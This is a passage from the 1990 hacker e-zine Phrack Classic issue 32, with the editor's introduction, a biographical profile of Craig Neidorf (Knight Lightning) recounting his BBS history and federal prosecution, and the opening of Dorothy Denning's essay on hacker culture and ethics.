==Phrack Classic==
Volume Three, Issue 32, File #1 of XX
Phrack Classic Newsletter Issue XXXII Index
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
November 17, 1990
Over the past year we have seen MANY changes in the Phreak/Hack community.
We felt the heat of Operation Sun Devil, watched our friends become public
scapegoats of the 'hacker world', and watched in anger as the lawyers have
tried to smash us and put us out like an old cigarette. Almost every day I
hear about someone who just got 'busted' for one reason or another. This
makes me sit back and think. If people go to jail for hacking, and hackers
know this, then why does it continue? Ahhh... an unsolved mystery. Maybe I
should call Time Life Books. No, I don't think so.
Anyways, I am pleased to announce a new era in electronic publications. A
new age for a new age. Ladies and gentlemen (Trumpet Fanfare Added Here),
Phrack Classic. Phrack Classic takes off where Phrack left off. Those of
you who have read Phrack might remember me as the editor for a
while. Well, now I am doing Phrack Classic to try to release a newsletter
that really describes what the Phreak/Hack world is like here in the 1990's.
People ask me why I am writing a hacker magazine, and they look down on me
for my attempt. I feel Phrack Classic is written for hackers, yes, but I also
feel that a hacker is one "who enjoys pushing the envelope, bypassing limits,
discovering knowledge, inventing solutions, adventuring into uncharted
areas." So is it so wrong to publish a newsletter for the exchange of free
information? No, I don't think so.
Anyone is welcome to submit an article for Phrack Classic, and I encourage
everyone to do so. I hope you enjoy this issue and I look forward to bringing
you many more in the not so distant future. Stay safe and be free. See you
at Ho Ho Con!
Crimson Death
Editor of Phrack Classic
(Quote taken from the Hackers 6.0 Conference Brochure)
If you have a question, an article submission, or you just wanna say
hello, send mail to Crimson Death and Doc Holiday at:
pc@well.uucp
_______________________________________________________________________________
Table of Contents:
1. Phrack Classic XXXII Index by Crimson Death
2. Phrack Classic Spotlight featuring Knight Lightning by Crimson Death
3. Concerning Hackers Who Break Into Computer Systems by Dorothy Denning
4. The Art of Investigation by Butler
5. Unix 'Nasties' by Sir Hackalot
6. Automatic Teller Machine Cards by Jester Sluggo
7. A Trip to the NCSC by Knight Lightning
8. Inside the SYSUAF.DAT File by Pain Hertz
9. RSTS by Crimson Death
10-12. Knight Line I/Parts 1-3 by Doc Holiday
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #2 of 12
==Phrack Classic Spotlight==
Knight Lightning
~~~~~~~~~~~~~~~~
Personal
~~~~~~~
Handle: Knight Lightning
Call him: Craig Neidorf
Past handles: None
Handle origin: Cross between character "Lightning Lad" from DC Comics'
Legion of Super-Heroes and Michael Knight from the NBC
television series "Knight Rider".
Date of Birth: I doubt you're sending me a birthday card so skip it.
Age at current date: 21 years old
Height: 5'10" or so (give or take an inch)
Weight: 135-140 lbs.
Eye color: Brown
Hair Color: Dark Brown
Computers: Apple IIc (Do you believe this?)
Co-Sysop of: Metal Shop Private, The Brewery, Quick Shop/Metal Shop
AE, Whackoland, The Dark Tower, Digital ITS (yay!),
Stronghold East and probably a few more I've forgotten
about.
Net address: C483307@UMCVMB.MISSOURI.EDU
C483307@UMCVMB.BITNET
(Yes, they actually gave me my account back!)
knight@well.sf.ca.us
------------------------------------------------------------------------------
For several years I had been a die hard fan of video games, both arcade
and home versions. It was really the Atari 2600 video game Adventure that led
me into the world of computers and hacking. As many people might know there
was a secret locked within this game concerning a "magic" dot. It was not
mentioned in any instruction manuals for the game, but if you could find it and
bring it to the right place in the game, you could enter a room that didn't
officially exist. In this room was a message flashing in gold and black. It
said "Created by Warren Robinett". From that point on I experimented with every
Atari cartridge I had. I tried screwing around with the connections, the
components on the system itself, and I attempted bizarre tactics within the
games, just to see what might happen. During that period of time I found
several more secretly implanted messages and developed new ways of playing the
games. Atari played on this idea quite a bit when they created a four game
saga called Swordquest, but by then the fun was taken out of it because you
knew already that something was waiting to be found. Eventually I upgraded to
ColecoVision, but before too long this bored me as well. It is sort of
interesting to see the new surge of home videogames of Nintendo, NEC, and Sega.
It makes me wonder if this cycle is permanent.
I was first introduced to the world of computers by a friend who had a
Commodore 64. He showed me what bulletin boards were and then took me on a
tour of the ARPAnet. Later that year, my long-time and best friend, known to
most of you as Taran King obtained the use of his father's IBM PC. Together we
explored various bulletin boards in the St. Louis area, always looking for new
places to visit.
In August of 1983 I received an Apple IIc as a birthday gift from my
parents. It was real basic -- no monitor (I had a black and white television
for that), no extra disk drive, no printer, no joystick, and no modem. Those
items I would have to earn. So instead of playing with faraway computer
systems, I was introduced to programming and a community of people who
considered themselves to be software pirates. These people seemed to be able
to get software before the companies even began to sell it. However, I was
content to play games like Ultima III and Wizardry and hack the game itself by
altering character values. This enabled me to move my characters through
different places, some of which I never might have realized existed. Later, I
was able to redesign the game itself to create an endless world of new
possibilities for intellectual stimulation.
Finally in March of 1984, my parents purchased me a modem. It was a sad
little piece of plastic made by Volksmodem, 300 baud and battery operated, but
it worked and now Knight Lightning was ready to take to the wires. By this
time I already knew a lot about the bulletin board community through Taran
King. Even so, it was relatively odd how fast I became co-sysop of the
ancestor to Metal Shop known as The Dark Tower. TDT was operated by a "hacker"
with the truly unoriginal name of David Lightman. Before I knew it, I was in
remote command of his system with full power over user validation and BBS
maintenance. Although the system went down after about six months, it did
attract a few out of state users and it was here that my notoriety began. It
was almost funny, but even as early as then Taran King, Forest Ranger, and I
became known as the top hacker/phreakers in the St. Louis area. To this day I
still don't understand why.
By July of 1985 most of the hacker bulletin boards in St. Louis had
disappeared, but The Dark Tower program lived again when Taran King created
Metal Shop: The Dark Tower Phase II. He took the name from a popular
afternoon rock'n roll program (KSHE FM radio) that centered on heavy metal.
Both of us had visited systems around the country and we were able to
effectively advertise MS. At one point we had over 500 registered users so we
switched to a general password system for security reasons and eventually in
January of 1986 the board became Metal Shop Private and we cut 4/5ths of the
users.
During the late Spring and early Summer of 1985 Taran King and I created
the 2600 Club. It was just a group name to stick behind our handles since
everybody was doing it, but it only took us a few months to realize just
how ignorant hacker groups really are. However, the 2600 Club had one
great legacy -- it gave birth to Phrack. If you go back and look, you'll
notice that the first issue of Phrack was a product of the 2600 Club. The idea
for doing Phrack came from Forest Ranger. Taran King provided the arena and
would be the editor and I came up with the name.
When I used to call bulletin boards like the Twilight Zone (sysoped by The
Marauder) I would data capture the message bases and save them in text files.
The messages from the hacking subboard would be saved in a file called HACKMESS
(which stood for hack messages), the messages from the phone phreak subboard
were saved as PHREAKMESS, but when there was a subboard where both these types
of messages appeared together, I simply merged the two names and came up with
PHRACKMESS. Since the newsletter would contain information on both topics and
more, I felt the name Phrack was applicable. So where did the "Inc." come
from? Actually it came from another DC Comics series called Infinity Inc.
Kind of silly now since we never intended to actually incorporate. The first
issue of Phrack was distributed on November 17, 1985.
In Phrack issue 2 I began the ongoing series of Phrack World News. I
followed every story I could and it was fun. The first issue was sort of lame,
but eventually I learned that PWN was the most popular segment of Phrack. The
greatest thing about PWN was that it was an original concept for a hacker
newsletter -- lots of people had tried to write "how-to" files, but no one had
ever tried news before. Who was getting busted? What did they do? How can I
make sure it doesn't happen to me? Lots of the stories were exaggerated or in
the case of Oryan QUEST, fabricated (by QUEST himself).
Outside of Phrack World News I wrote files about Videoconferencing,
Private Branch eXchanges, and a few others here and there. Prior to Phrack
I had released a huge glossary of telecommunications terms and files about the
divestiture of AT&T and its aftermath. Taran King and I also wrote a joke file
about "Real Phreaks" that was echoed by a continuation of that file in the
Phrack parody issue number 13 that was released on April 1, 1987.
Throughout my years I have met many people who call themselves hackers
and/or phone phreaks:
Android Pope - I wonder how married life is treating him.
Aristotle - Sporty! He is the former editor of the New TAP.
Bad Subscript - Right hand man to Control C and an expert at disco dancing
in high speed Camaros.
Bill from RNOC - How have your phone bills been? High? Have they been!?
He is also known as "the most dangerous man in New York."
Beer Wolf - Former sysop of the (Metal Shop) Brewery.
Blue Buccaneer - Lost track of him over the years.
Cat Man - How about a nice Hawaiian Punch?
Cheap Shades - Now a Computer Science graduate of University of
Missouri-Rolla. Former sysop of Metal Shop AE and
QuickShop.
Control C - A man with serious problems right now. Hope you get those
videotapes and best of luck!
Crimson Death - The one in 618 NPA. Very un-original name, but definitely
one of a kind.
Cryptic Fist - Kinda warm for that leather jacket, isn't it? (90 degrees)
Cutthroat - So what McDonalds do *you* work at?
Dan The Operator - An informant for John Maxfield (SummerCon '87).
Data Line - Now a government agent, but hardly a hacker tracker.
David Lightman - The sysop of The Dark Tower in 314 NPA.
The Dictator - Not-so secret agent of Gail Thackeray, the assistant
Arizona state attorney behind Operation Sun-Devil.
In a past life, Dale was the creator of Candid Camera.
What a surprise that was this summer.
Disk Jockey - I thought he was a great guy until he started to backstab
me on Lunatic Labs while I was under indictment.
Doc Holiday (901) - The original!
Dr. Cypher - Knowledgeable person who remains local.
Dr. Forbin - Last seen at SummerCon '89.
Dr. Ripco - Well haven't met him yet, but in a couple of weeks.
Doom Prophet - A friend who seems to have disappeared.
Epsilon - Must have lost my number I guess.
Emmanuel Goldstein - Also known as Eric Corley, the editor of 2600 Magazine.
Erik Bloodaxe - He is a wildcard... totally unpredictable... hacks by the
seat of his pants. Still active, but he'd better not have
a squirt gun next to his bed or he may be sorry.{SS}
Forest Ranger - The man who introduced me to the hacker elite way back
when. Former editor of TeleComputist Newsletter.
Gary Seven - Don't remember much about him. Met him with Lex in Fla.
Hatchet Molly - You know him as Computer Underground Digest's Gordon
Meyer. He used a hacker alias to better enable him to
write his famous thesis.
Jester Sluggo - A mystery man who is still a legend in the Zantigo
restroom and a better than average drunk driver.
Kleptic Wizard - Was he BJ or the Bear?
Lex Luthor - One time great legend of LOD, now secret BellSouth
Security (at least until I hear otherwise).
The Leftist - I wonder what he was going to say about me at my trial.
He gave me a nod the day they dropped the charges against
me. The US Attorney's office tells me that he was going
to claim he learned all he knew about hacking from reading
Phrack.
Loki - Lost track of him over the years.
Lucifer 666 - Lights, Camera, Action!
The Mad Hacker - Sysop of The Private Connection in 219 NPA.
Mad Hatter - Still don't know what to make of him, but I wonder if he
still thinks table salt and baking soda are cocaine.
The Mentor - Author of GURPS CyberPunk and former sysop of The Phoenix
Project bulletin board.
The Noid - Important enough for Southwestern Bell to question me
about him so important enough to be mentioned here.
Par - Hans.
Phantom Phreaker - A friend.
Phil Phree - Sort of spaced out character and right hand man to The
Ur-vile.
Phrozen Ghost - Lost track of him.
Predat0r - Anarchistic editor of the New TAP.
The Prophet - Didn't actually "meet" him, but I did see him and hear him
speak... as a witness for the prosecution at my trial. I
don't hold a grudge. His testimony helped clear me.
Rabbit - Franz.
The Renegade - Thinks he is part of the Illuminati.
Reverend Enge - Not that religious.
Sir Francis Drake - A great guy with an odd taste in jewelry. The editor of
the now defunct WORM. Duck!
Sir William - Never did hear the whole story of his problems with the
University of Michigan computing staff.
Surfer Bob - Lost track of him, but he enjoyed a tan at SummerCon'88.
Synthetic Slug - Surfs up!
Taran King - My best friend of over 11 years.
TWCB Inc. - Two brothers who attempted to resurrect TAP, but failed.
Tuc - Hey! He's TUC!
The Ur-Vile - Don't know how I feel about him. He needs a real handle.
Some of the memorable bulletin boards I was on include:
Alliance - By Phantom Phreaker
Brainstorm Elite - Where I met Phantom Phreaker and recruited him to Metal
Shop Private.
Broadway Show - By Broadway Hacker. Changed its name to The Radio
Station.
Catch-22 - By Silver Spy. Only 22 users on this system.
Chamas - By Terra (Chaos Computer Club) in Germany.
Dark Tower - By David Lightman 314
Digital ITS - By Oryan QUEST. BBS Commands were in Spanish.
DUNE - Secret system imbedded on the Dartmouth University
mainframe operated remotely by Apollo Phoebus.
Flying Circus - By Monty Python
FreeWorld II - By Major Havoc
Hell Phrozen Over - By the original Crimson Death. Inspiration for the
first Phrack Pro-Phile.
Intergalactic Dismantling, Inc. - By Aiken Drum
Lost City of Atlantis - By The Lineman
Lunatic Labs UnLtd. - By The Mad Alchemist. Great system!
Matrix - By Dr. Stangelove
Metal Shop AE - By Cheap Shades when he lived in St. Louis, Missouri.
Metal Shop Brewery - By Beer Wolf who now denies that it ever happened.
Metal Shop Private - Greatest bulletin board of all time.
MetroMedia - By Dr. Doom. System became Danger Zone Private.
NetSys - By Terminus. NetSys is now in possession of US Secret
Service and Terminus' life is in a shambles. They set
him up and shut him down. You know him as Len Rose.
Pearly Gates - First real out of state bulletin board that I called.
It had a secret section of the board for all of the
really good information. It was operated by Simon
Templar.
Phoenix Project - By The Mentor. Great center of learning.
Phreak Klass 2600 - By The Egyptian Lover. Preceded The Phoenix Project as
a great center of learning.
Pipeline - Another early bbs I visited.
Pirate-80 - A codes board run by Scan Man that has been up for
almost 10 years. This system was NOT a target in
Operation Sun-Devil. Odd?
Private Connection - By The Mad Hacker
Private Sector - Legendary system.
QuickShop - By Cheap Shades when he lived in Rolla, Missouri.
RACS III - By Tuc
Radio Station - See The Broadway Show.
Ripco - By Dr. Ripco - Shut down in Operation Sun-Devil, but
it's back up now.
Septic Tank - By The Safecracker. Second generation of The Twilight
Zone.
ShadowSpawn - By Psychic Warlord. Great debate about the use of
handles and real name/telephone/etc. "We're Not
*ELITE*, We're Just Cool As Hell!" Taran King thought
they were elite in the negative sense of the word.
Great system though.
Speed Demon Elite - By The Radical Rocker and home base to MetaliBashers,
Inc.
Stronghold East Elite - The "real" sysop was Slave Driver, but the board was
run from the home of The Equalizer.
Twilight Zone - By The Marauder. Great system for knowledge from my
early days.
Zyolog - By Byte Rider in Hawaii.
There are probably a few others that I have forgotten to mention. My
greatest computer learning experiences came from people like Bill From RNOC,
RNOC, Phantom Phreaker, Forest Ranger, and the authors of the multitude of
Phrack files and other technical journals.
In general I see computers as the communications medium of the 21st
Century so I devoted a lot of time to mastering their use. I do not advocate
the illegal breaking in to computer systems, but there are certain types of
information that I feel should be available to everyone equally and not just
the rich or the well connected.
Through my experiences on the Internet, I have had legitimate access to
IBM VM/CMS, Unix, and VAX/VMS systems. For the most part I am content with my
VM/CMS account, but will accept invitations from system managers to join their
systems as well.
With Forest Ranger and Taran King, I organized and attended SummerCon '87,
SummerCon '88, and SummerCon '89. I did not attend SummerCon '90 since I was
in Chicago at the time. I helped in organizing and attended PartyCon '87 and
most recently I appeared and spoke at the 13th Annual National Computer
Security Conference in Washington D.C.
I had been a part of TeleComputist Newsletter, which inadvertently led to
my first real media appearance (Detroit Free Press) and prior to that I was
helping TWCB Inc. to create a NEW TAP. However, when I learned that they were
just pulling a fraud, I exposed them. For 5 years I devoted myself to Phrack
with absolutely no compensation save knowledge and experiences gained.
===============================================================================
Interests: Racquetball (varsity team in high school and a bookshelf full
of trophies), Telecommunications, Computers, Music (classic
rock and pop music... NO RAP!), Fraternity life (well at least
up until the trustees suspended me for being indicted), Women
(sexy and smart over just good looks any day), Driving at warp
speed on the interstate.
Craig's Favorite Things
-----------------------
Women: I've got it, but don't flaunt it.
Cars: Ford Mustang, Eagle Talon, Nissan 300 ZX, and Porsche *911* Carrera!
Foods: No Curry in a hurry-Blecch! American, Italian, Mexican, and Chinese!
Music: Genesis, Rush, Yes, Chicago, Eagles, Def Leppard, The Police, Styx...
Leisure: Sleeping, working out, racquetball, writing, computing.
Alcohol: Bacardi, Smirnoff, Jack Daniels, Pat O'Briens, Hard Rock Cafe.
Most Memorable Experiences
--------------------------
All of the SummerCons, having an assistant U.S. Attorney lie to my face and
tell me I wasn't in trouble five days after he went to the grand jury to have
me indicted, football game with Sluggo in the Zantigo parking lot, road trip to
Chicago for PartyCon '87, my time in a St. Louis Federal holding facility
after I turned myself over to the U.S. Federal Marshals (E911 Incident),
Taran King and Cheap Shades out of jail when they were caught trashing,
summer Alliance teleconferences with the PhoneLine Phantoms, the first time I
heard Frank & The Funny Phone Call, watching Control C bother some girl
in the airport and then seeing Erik Bloodaxe fall in love with her.
Some Other People To Mention
----------------------------
Sheldon Zenner - The greatest attorney practicing today. He turned
everything around and saved my future from a legal system
gone awry. Thanks also to Kliebard, Dunlop, Berkowitz,
and Kaufman.
John Perry Barlow - Lyricist for the Grateful Dead and amazing writer, John
also participated a great deal in generating publicity
about my case and helped found the Electronic Frontier
Foundation.
Dr. Dorothy Denning - A lady who not only helped with my defense, but invited
me to the 13th Annual National Computer Security
Conference and is a good friend.
Peter Denning - Senior editor of the Communications of the ACM and an
interesting fellow in his own right.
Scott Ellentuch - Mentioned earlier as Tuc, Scott is the president of the
Telecom Computer Security Group and a close friend. Tuc
assisted the defense team by locating the Bellcore public
catalog and the 911 documents found within. Thanks Tuc!
Terry Gross - Attorney with Rabinowitz & Boudin in New York City who
was hired by the EFF to work on court motions dealing
with the First Amendment.
Mike Godwin - Don't know Mike very well yet, but he was very outspoken
in Computer Underground Digest while I was under
indictment and now he is in-house counsel to the
Electronic Frontier Foundation.
Katie Hafner - Author of a book coming soon about Pengo, Kevin Mitnick,
and Robert Morris, Jr. I met Katie at the NCSConference.
Steve Jackson - Founder of Steve Jackson Games. I haven't yet had the
pleasure of meeting Steve, but we may be running into
each other in the near future.
Mitch Kapor - Industry wizard and creator of the Lotus 1-2-3 program,
Mitch is a founding member of the Electronic Frontier
Foundation that provided legal assistance in my case. I
hope to meet him face-to-face in the near future.
Gordon Meyer - Gordon has been a tremendous help with Phrack and a
friend throughout my entire trial ordeal.
John Nagle - Inventor who gave technical assistance to my defense team
and located some very important public documents.
Marc Rotenberg - Director of the Computer Professionals For Social
Responsibility in Washington D.C. CPSR is an
organization lobbying Congress for reforms in the
Computer Fraud & Abuse Act and other legislation. I hope
to be working with him in the future.
Jim Thomas - Creator and editor of Computer Underground Digest, he
brought the details and evidence in my trial to the
public eye which helped me gain support.
Steve Wozniak - Never had any contact with him, but since he had a hand
in EFF, I thought I would mention him. Incidentally I'm
ready to upgrade computers if someone has a Macintosh on
hand.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
David Lightman - The one in 214. See Oryan QUEST.
Magic Hasan - Totally freaked out when I contacted him this semester. It
was like he thought I had the plague or something.
Olorin The White - He couldn't seem to understand that I did not want to join
his group.
Oryan QUEST - A hacker who made up news for PWN just to boost his
reputation. Unleash with full force on this!
Sally Ride - Also known as Space Cadet, SR co-wrote one of the most
interesting PWN articles ever printed.
===============================================================================
Private Jokes
~~~~~~~~~~~~
There are far too many to go through and most of them have been previously
written by Taran King in a Phrack Prophile that appeared in issue 20 of Phrack.
My private jokes shall remain private between those involved or at least until
I publish a book covering the topic.
===============================================================================
Phrack is a part of my life that is now over. I hope that Phrack Classic
which appears to be a second generation Phrack will learn from its predecessor
and not allow any articles that advocate the illegal entry into computer
systems. On the other hand, I hope they will continue to bring interesting
information and news to light every issue.
For the record, I am not the editor of Phrack Classic. In fact I am not
even a part of their staff. I would ask that no one send me any articles for
that publication because they will not be forwarded. I take no responsibility
for the actions taken by Phrack Classic, but I have faith that they shall stay
on the path of honesty and integrity.
I also have a few words to say about some other issues. My case and
prosecution had absolutely nothing to do with Operation Sun-Devil, with a
possible exception being the secret video-taping done by the United States
Secret Service at the Ramada Inn-Westport (Maryland Heights, Missouri) during
July 22-24, 1988 (i.e., SummerCon '88). Operation Sun-Devil was an attempt to
crack down on credit card and calling card abusers and NOT hackers. Yes, there
are some hackers that abuse these items, but the mere abuse of such does not
make someone a hacker and it is about time that mainstream reporters,
government agents, and prosecutors began to understand the difference.
I feel that the abuse of "cards" is very immature and should be met with
stern punishment. I myself have been the victim of credit card fraud and I can
tell you that it is not pleasant to open your bill and see expensive charges
from QVC Home Shopping Network. For the younger readers, it may take them a
few years to understand this... perhaps when they have credit cards and bills
of their own to deal with.
As you may guess there is MUCH MORE to my story especially concerning the
last 10 issues of Phrack, the Internet, and the E911 incident, but now is not
the time or the place to tell it. Sometime in the future I hope to assemble
the tales of all my adventures in the computer underground and publish them in
a real book.
Finally, Hackers are *NOT* criminals! Quoting from the brochure for this
year's Hackers Conference in Saratoga, California, a Hacker is "someone who
enjoys pushing the envelope, bypassing limits, discovering knowledge, inventing
solutions, adventuring into uncharted areas."
:Craig Neidorf
===============================================================================
...And now for the regularly taken poll from all interviewees.
Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks?
"I would not consider most of the hackers or phone phreaks I have met to
be computer geeks, however over the years I have run into people whose goal in
life is to pirate every piece of software in existence and of those people I
feel that a strong percentage are 'geeks'."
Thanks for your time, Craig. "No problem."
Crimson Death
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #3 of 12
Concerning Hackers Who Break into Computer Systems
Dorothy E. Denning
Digital Equipment Corp., Systems Research Center
130 Lytton Ave., Palo Alto, CA 94301
415-853-2252, denning@src.dec.com
Abstract
A diffuse group of people, often called ``hackers,'' has been
characterized as unethical, irresponsible, and a serious danger to
society for actions related to breaking into computer systems. This
paper attempts to construct a picture of hackers, their concerns,
and the discourse in which hacking takes place. My initial findings
suggest that hackers are learners and explorers who want to help
rather than cause damage, and who often have very high standards
of behavior. My findings also suggest that the discourse surrounding
hacking belongs at the very least to the gray areas between larger
conflicts that we are experiencing at every level of society and
business in an information age where many are not computer literate.
These conflicts are between the idea that information cannot be owned
and the idea that it can, and between law enforcement and the First
and Fourth Amendments. Hackers have raised serious issues about
values and practices in an information society. Based on my findings,
I recommend that we work closely with hackers, and suggest several
actions that might be taken.
1. Introduction
The world is crisscrossed with many different networks that are used
to deliver essential services and basic necessities -- electric power,
water, fuel, food, goods, to name a few. These networks are all
publicly accessible and hence vulnerable to attacks, and yet virtually
no attacks or disruptions actually occur.
The world of computer networking seems to be an anomaly in the
firmament of networks. Stories about attacks, breakins, disruptions,
theft of information, modification of files, and the like appear
frequently in the newspapers. A diffuse group called ``hackers''
is often the target of scorn and blame for these actions. Why are
computer networks any different from other vulnerable public networks?
Is the difference the result of growing pains in a young field?
Or is it the reflection of deeper tensions in our emerging information
society?
There are no easy or immediate answers to these questions. Yet it
is important to our future in a networked, information-dependent
world that we come to grips with them. I am deeply interested in
them. This paper is my report of what I have discovered in the early
stages of what promises to be a longer investigation. I have
concentrated my attention in these early stages on the hackers
themselves. Who are they? What do they say? What motivates them?
What are their values? What do they have to say about public policies
regarding information and computers? What do they have to say about
computer security?
From such a profile I expect to be able to construct a picture of
the discourses in which hacking takes place. By a discourse I mean
the invisible background of assumptions that transcends individuals
and governs our ways of thinking, speaking, and acting. My initial
findings lead me to conclude that this discourse belongs at the very
least to the gray areas between larger conflicts that we are
experiencing at every level of society and business, the conflict
between the idea that information cannot be owned and the idea that
it can, and the conflict between law enforcement and the First and
Fourth Amendments.
But, enough of the philosophy. On with the story!
2. Opening Moves
In late fall of 1989, Frank Drake (not his real name), editor of
the now defunct cyberpunk magazine W.O.R.M., invited me to be
interviewed for the magazine. In accepting the invitation, I hoped
that something I might say would discourage hackers from breaking
into systems. I was also curious about the hacker culture. This
seemed like a good opportunity to learn about it.
The interview was conducted electronically. I quickly discovered
that I had much more to learn from Drake's questions than to teach.
For example, he asked: ``Is providing computer security for large
databases that collect information on us a real service? How do
you balance the individual's privacy vs. the corporations?'' This
question surprised me. Nothing that I had read about hackers ever
suggested that they might care about privacy. He also asked: ``What
has (the DES) taught us about what the government's (especially NSA's)
role in cryptography should be?'' Again, I was surprised to discover
a concern for the role of the government in computer security. I
did not know at the time that I would later discover considerable
overlap in the issues discussed by hackers and those of other computer
professionals.
I met with Drake to discuss his questions and views. After our
meeting, we continued our dialog electronically with me interviewing
him. This gave me the opportunity to explore his views in greater
depth. Both interviews appear in ``Computers Under Attack,''
edited by Peter Denning (DenningP90).
My dialog with Drake increased my curiosity about hackers. I read
articles and books by or about hackers. In addition, I had discussions
with nine hackers whom I will not mention by name. Their ages ranged
from 17 to 28.
The word ``hacker'' has taken on many different meanings ranging
from 1) ``a person who enjoys learning the details of computer systems
and how to stretch their capabilities'' to 2) ``a malicious or
inquisitive meddler who tries to discover information by poking around
... possibly by deceptive or illegal means ...'' (Steele83). The
hackers described in this paper are both learners and explorers who
sometimes perform illegal actions. However, all of the hackers I
spoke with said they did not engage in or approve of malicious acts
that damage systems or files. Thus, this paper is not about malicious
hackers. Indeed, my research so far suggests that there are very
few malicious hackers. Neither is this paper about career criminals
who, for example, defraud businesses, or about people who use stolen
credit cards to purchase goods. The characteristics of many of the
hackers I am writing about are summed up in the words of one of the
hackers: ``A hacker is someone who experiments with systems...
(Hacking) is playing with systems and making them do what they were
never intended to do. Breaking in and making free calls is just
a small part of that. Hacking is also about freedom of speech and
free access to information -- being able to find out anything. There
is also the David and Goliath side of it, the underdog vs. the system,
and the ethic of being a folk hero, albeit a minor one.''
Richard Stallman, founder of the Free Software Foundation who calls
himself a hacker according to the first sense of the word above,
recommends calling security-breaking hackers ``crackers''
(Stallman84). While this description may be more accurate, I shall
use the term ``hacker'' since the people I am writing about call
themselves hackers and all are interested in learning about computer
and communication systems. However, there are many people like
Stallman who call themselves hackers and do not engage in illegal
or deceptive practices; this paper is also not about those hackers.
In what follows I will report on what I have learned about hackers
from hackers. I will organize the discussion around the principal
domains of concerns I observed. I recommend Meyer's thesis (Meyer89)
for a more detailed treatment of the hackers' social culture and
networks, and Meyer and Thomas (MeyerThomas90) for an interesting
interpretation of the computer underground as a postmodernist rejection
of conventional culture that substitutes ``rational technological
control of the present for an anarchic and playful future.''
I do not pretend to know all the concerns that hackers have, nor
do I claim to have conducted a scientific study. Rather, I hope
that my own informal study motivates others to explore the area
further. It is essential that we as computer security professionals
take into account hackers' concerns in the design of our policies,
procedures, laws regulating computer and information access, and
educational programs. Although I speak about security-breaking hackers
as a group, their competencies, actions, and views are not all the
same. Thus, it is equally important that our policies and programs
take into account individual differences.
In focusing on what hackers say and do, I do not mean for a moment
to set aside the concerns of the owners and users of systems that
hackers break into, the concerns of law enforcement personnel, or
our own concerns as computer security professionals. But I do
recommend that we work closely with hackers as well as these other
groups to design new approaches and programs for addressing the
concerns of all. Like ham radio operators, hackers exist, and it
is in our best interest that we learn to communicate and work with
them rather than against them.
I will suggest some actions that we might consider taking, and I
invite others to reflect on these and suggest their own. Many of
these suggestions are from the hackers themselves; others came from
the recommendations of the ACM Panel on Hacking (Lee86) and from
colleagues.
I grouped the hackers' concerns into five categories: access to
computers and information for learning; thrill, excitement and
challenge; ethics and avoiding damage; public image and treatment;
and privacy and first amendment rights. These are discussed in
the next five subsections. I have made an effort to present my
findings as uncritical observations. The reader should not infer
that I either approve or disapprove of actions hackers take.
3. Access to Computers and Information for Learning
Although Levy's book ``Hackers'' (Levy84) is not about today's
security-breaking hackers, it articulates and interprets a ``hacker
ethic'' that is shared by many of these hackers. The ethic includes
two key principles that were formulated in the early days of the
AI Lab at MIT: ``Access to computers -- and anything which might
teach you something about the way the world works -- should be
unlimited and total,'' and ``All information should be free.'' In
the context in which these principles were formulated, the computers
of interest were research machines and the information was software
and systems information.
Since Stallman is a leading advocate of open systems and freedom
of information, especially software, I asked him what he means by
this. He said: ``I believe that all generally useful information
should be free. By `free' I am not referring to price, but rather
to the freedom to copy the information and to adapt it to one's own
uses.'' By ``generally useful'' he does not include confidential
information about individuals or credit card information, for example.
He further writes: ``When information is generally useful,
redistributing it makes humanity wealthier no matter who is
distributing and no matter who is receiving.'' Stallman has argued
strongly against user interface copyright, claiming that it does
not serve the users or promote the evolutionary process (Stallman90).
I asked hackers whether all systems should be accessible and all
information should be free. They said that it is OK if some systems
are closed and some information, mainly confidential information
about individuals, is not accessible. They make a distinction between
information about security technology, e.g., the DES, and confidential
information protected by that technology, arguing that it is the
former that should be accessible. They said that information hoarding
is inefficient and slows down evolution of technology. They also
said that more systems should be open so that idle resources are
not wasted. One hacker said that the high costs of communication
hurt the growth of the information economy.
These views of information sharing seem to go back at least as far
as the 17th and 18th centuries. Samuelson (Samuelson89) notes that
``The drafters of the Constitution, educated in the Enlightenment
tradition, shared that era's legacy of faith in the enabling powers
of knowledge for society as well as the individual.'' She writes
that our current copyright laws, which protect the expression of
information, but not the information itself, are based on the belief
that unfettered and widespread dissemination of information promotes
technological progress. (Similarly for patent laws which protect
devices and processes, not the information about them.) She cites
two recent court cases where courts reversed the historical trend
and treated information as ownable property. She raises questions
about whether in entering the Information Age where information is
the source of greatest wealth, we have outgrown the Enlightenment
tradition and are coming to treat information as property.
In a society where knowledge is said to be power, Drake expressed
particular concern about what he sees as a growing information gap
between the rich and poor. He would like to see information that
is not about individuals be made public, although it could still
be owned. He likes to think that companies would actually find it
to their advantage to share information. He noted how IBM's disclosure
of the PC allowed developers to make more products for the computers,
and how Adobe's disclosure of their fonts helped them compete against
the Apple-Microsoft deal. He recognizes that in our current political
framework, it is difficult to make all information public, because
complicated structures have been built on top of an assumption that
certain information will be kept secret. He cites our defense policy,
which is founded on secrecy for military information, as an example.
Hackers say they want access to information and computing and network
resources in order to learn. Both Levy (Levy84) and Landreth
(Landreth89) note that hackers have an intense, compelling interest
in computers and learning, and many go into computers as a profession.
Some hackers break into systems in order to learn more about how
the systems work. Landreth says these hackers want to remain
undiscovered so that they can stay on the system as long as possible.
Some of them devote most of their time to learning how to break the
locks and other security mechanisms on systems; their background
in systems and programming varies considerably. One hacker wrote
``A hacker sees a security hole and takes advantage of it because
it is there, not to destroy information or steal. I think our
activities would be analogous to someone discovering methods of
acquiring information in a library and becoming excited and perhaps
engrossed.''
We should not underestimate the effectiveness of the networks in
which hackers learn their craft. They do research, learn about
systems, work in groups, write, and teach others. One hacker said
that he belongs to a study group with the mission of churning out
files of information and learning as much as possible. Within the
group, people specialize, collaborate on research projects, share
information and news, write articles, and teach others about their
areas of specialization. Hackers have set up a private system of
education that engages them, teaches them to think, and allows them
to apply their knowledge in purposeful, if not always legal,
activity. Ironically, many of our nation's classrooms have been
criticized for providing a poor learning environment that seems to
emphasize memorization rather than thinking and reasoning. One hacker
reported that through volunteer work with a local high school, he
was trying to get students turned on to learning.
Many hackers say that the legitimate computer access they have through
their home and school computers does not meet their needs. One student
told me that his high school did not offer anything beyond elementary
courses in BASIC and PASCAL, and that he was bored by these. Hans
Huebner, a hacker in Germany who goes by the name Pengo, wrote in
